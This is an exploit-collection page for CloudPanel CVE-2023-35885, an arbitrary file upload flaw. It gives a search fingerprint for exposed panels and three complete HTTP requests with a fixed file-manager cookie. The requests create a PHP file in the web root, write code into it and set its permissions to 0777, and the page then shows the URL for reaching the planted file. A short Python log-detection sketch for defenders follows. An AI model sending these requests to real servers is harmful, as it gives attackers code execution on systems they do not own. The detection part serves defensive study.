Awesome-POC/Web应用漏洞/CloudPanel makefile 任意文件上传漏洞 CVE-2023-35885.md
2024-11-06 14:10:36 +08:00

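# CloudPanel makefile Arbitrary File Upload Vulnerability CVE-2023-35885
## Vulnerability Description
CloudPanel is a free, PHP-based, high-performance server control panel with lightweight components and modern features. It is easy to use, supports multiple PHP versions, and offers multi-language switching.
The CloudPanel makefile endpoint has an arbitrary file upload vulnerability through which an attacker can gain server privileges.
## Affected Versions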
cloudpanel 2.0.0 >= 2.3.0
## Network Mapping
```
title=="CloudPanel | Log In"
```
## Vulnerability Reproduction
Login page
![image-20231115102840968](images/image-20231115102840968.png)
PoC
```
POST /file-manager/backend/makefile HTTP/1.1
Host:
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 54
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/&name=Test.php
```
![image-20231115103123744](images/image-20231115103123744.png)
```
POST /file-manager/backend/text HTTP/1.1
Host:
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 289
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/Test.php&content=<?php phpinfo()?>
```
![image-20231115103133858](images/image-20231115103133858.png)
```
POST /file-manager/backend/permissions HTTP/1.1
Host:
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 65
Content-Type: application/x-www-form-urlencoded

id=/htdocs/app/files/public/Test.php&permissions=0777
```
![image-20231115103158786](images/image-20231115103158786.png)
Access
```
/Test.php
```
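For defenders, the request sequence above leaves a recognizable pattern in the web server's access log. The following detection sketch is an added example, not part of the original page or of CloudPanel. It assumes all requests land in one nginx combined-format access log; the sample lines, the 10-minute window and the `find_chains` helper are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Nov/2023:10:31:02 +0800] "POST /file-manager/backend/makefile HTTP/1.1" 200 31 "-" "curl/8.1"
203.0.113.7 - - [15/Nov/2023:10:31:09 +0800] "POST /file-manager/backend/text HTTP/1.1" 200 31 "-" "curl/8.1"
198.51.100.4 - - [15/Nov/2023:10:31:15 +0800] "POST /file-manager/backend/text HTTP/1.1" 200 31 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Nov/2023:10:31:20 +0800] "POST /file-manager/backend/permissions HTTP/1.1" 200 31 "-" "curl/8.1"
203.0.113.7 - - [15/Nov/2023:10:31:41 +0800] "GET /Test.php HTTP/1.1" 200 91234 "-" "curl/8.1"
"""

# client, timestamp, method, URI and status from a combined-format line
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
STEPS = ["/file-manager/backend/makefile", "/file-manager/backend/text",
         "/file-manager/backend/permissions"]  # endpoint order shown on the page
WINDOW = timedelta(minutes=10)  # assumed correlation window

def find_chains(log_text):
    """Return (client_ip, php_path) for each client that POSTs the three
    file-manager endpoints in order, then GETs a .php path with status 200."""
    state = defaultdict(lambda: {"step": 0, "start": None})
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, uri, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        path = uri.split("?", 1)[0]
        s = state[ip]
        if s["start"] is not None and when - s["start"] > WINDOW:
            s["step"], s["start"] = 0, None  # chain expired
        if method == "POST" and path == STEPS[0]:
            s["step"], s["start"] = 1, when  # (re)start a chain
        elif method == "POST" and 0 < s["step"] < 3 and path == STEPS[s["step"]]:
            s["step"] += 1
        elif (s["step"] == 3 and method == "GET" and status == "200"
              and path.lower().endswith(".php")):
            hits.append((ip, path))
            s["step"], s["start"] = 0, None
    return hits

if __name__ == "__main__":
    for ip, path in find_chains(SAMPLE_LOG):
        print(f"ALERT {ip} created a file via file-manager and then fetched {path}")
```

A hit is a triage signal rather than proof, since an administrator creating a PHP file through the file manager produces the same sequence.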